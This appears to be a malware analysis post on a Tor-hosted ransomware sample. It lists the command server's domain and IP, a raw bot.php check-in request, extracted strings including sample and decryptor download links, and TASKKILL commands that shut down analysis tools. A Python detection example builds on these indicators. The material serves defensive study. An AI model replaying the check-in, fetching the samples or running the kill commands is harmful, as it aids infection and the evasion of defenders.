The ransomware is hosted via Tor.
Domain: qbstdn6k7iivyki2.onion.direct
Address: 5.135.181.100
Country: France
HTTP requests:
5.135.181.100:80 (qbstdn6k7iivyki2.onion.direct) GET /lending/bot.php?name=4m4qn8F4804DA9-83EC&kod=tFpJtvsF^lUPeqDDzAQnkOeFfH]zSstunSA[dotBceHrJvZpTz&pid=2

GET /lending/bot.php?name=4m4qn8F4804DA9-83EC&kod=tFpJtvsF^lUPeqDDzAQnkOeFfH]zSstunSA[dotBceHrJvZpTz&pid=2 HTTP/1.1
Host: qbstdn6k7iivyki2.onion.direct
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

Decoded base64 artifacts: n*xN7 ZIC09_4-
Some strings:
hxxp://qbstdn6k7iivyki2.onion.direct/chek.php?vname=
hxxp://qbstdn6k7iivyki2.onion.direct/lending/bot.php?name=
hxxp://qbstdn6k7iivyki2.onion.direct/lending/send.php?name=
hxxps://github.com/m0nk8/tor/blob/master/DecryptorMAX.exe?raw=true
hxxps://www.paypal-cash.com
TASKKILL /F /IM cmd.exe
TASKKILL /F /IM filemon.exe
TASKKILL /F /IM LordPE.exe
TASKKILL /F /IM msconfig.exe
TASKKILL /F /IM procexp.exe
TASKKILL /F /IM procexp64.exe
TASKKILL /F /IM procmon.exe
TASKKILL /F /IM regedit.exe
TASKKILL /F /IM regmon.exe
TASKKILL /F /IM rstrui.exe
TASKKILL /F /IM tcpview.exe
TASKKILL /F /IM wireshark.exe
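Both the bot.php check-in above and the TASKKILL list translate directly into proxy and host detections. The Python below is an added example, not code from the original post: the log entries and command lines it checks are constructed, and only the URL path, parameter names, User-Agent and killed process names are taken from the strings above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Check-in shape from the request above: GET /lending/bot.php?name=..&kod=..&pid=.. with the Synapse UA.
BEACON_PATH = "/lending/bot.php"
BEACON_PARAMS = {"name", "kod", "pid"}
SYNAPSE_UA = "Mozilla/4.0 (compatible; Synapse)"
# Analysis and recovery tools the sample force-kills (from the TASKKILL strings above).
KILLED_TOOLS = {"cmd.exe", "filemon.exe", "lordpe.exe", "msconfig.exe", "procexp.exe", "procexp64.exe",
                "procmon.exe", "regedit.exe", "regmon.exe", "rstrui.exe", "tcpview.exe", "wireshark.exe"}
# Matches "TASKKILL /F /IM name.exe"; /F is optional so a kill issued without it still counts.
TASKKILL_RE = re.compile(r"\btaskkill(?:\.exe)?\b(?:\s+/f)?\s+/im\s+(\S+)", re.IGNORECASE)

def is_beacon(method, url, user_agent):
    """True if one proxy log entry has the bot.php check-in shape (independent of the host)."""
    parts = urlsplit(url)
    if method.upper() != "GET" or parts.path.lower() != BEACON_PATH:
        return False
    params = set(parse_qs(parts.query, keep_blank_values=True))
    return BEACON_PARAMS <= params and user_agent == SYNAPSE_UA

def killed_analysis_tools(cmdlines):
    """Return the analysis tools that a batch of process command lines tries to kill."""
    hits = set()
    for line in cmdlines:
        m = TASKKILL_RE.search(line)
        if m and m.group(1).lower() in KILLED_TOOLS:
            hits.add(m.group(1).lower())
    return hits

def triage(proxy_log, cmdlines, min_tools=3):
    """Combine both signals: check-in URLs seen, and whether enough tools were killed
    to look like deliberate anti-analysis rather than a one-off admin command."""
    beacons = [url for method, url, ua in proxy_log if is_beacon(method, url, ua)]
    tools = killed_analysis_tools(cmdlines)
    return {"beacons": beacons, "killed_tools": sorted(tools),
            "anti_analysis": len(tools) >= min_tools}

# Constructed sample data (not captured from the page): one check-in, one benign request, a TASKKILL burst.
PROXY_LOG = [
    ("GET", "http://qbstdn6k7iivyki2.onion.direct/lending/bot.php?name=4m4qn8F4804DA9-83EC&kod=abc&pid=2", SYNAPSE_UA),
    ("GET", "http://example.com/index.php?name=x&kod=y&pid=2", "Mozilla/5.0"),
]
CMDLINES = ["TASKKILL /F /IM procexp.exe", "TASKKILL /F /IM wireshark.exe",
            "taskkill /f /im regedit.exe", "taskkill /f /im notepad.exe"]

if __name__ == "__main__":
    print(triage(PROXY_LOG, CMDLINES))
```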
Panel: hxxp://qbstdn6k7iivyki2.onion/lending/
Here you can see what it does to your PC if you are infected with:
Sample: hxxp://lipetskrulit.com/svchost.exe
Hosting info:
http://whois.domaintools.com/5.135.181.100
Mike Olivera - November 6, 2015 at 6:59 pm
Wow, perfect. But how do you know the IP of an onion server? o.O
Thanks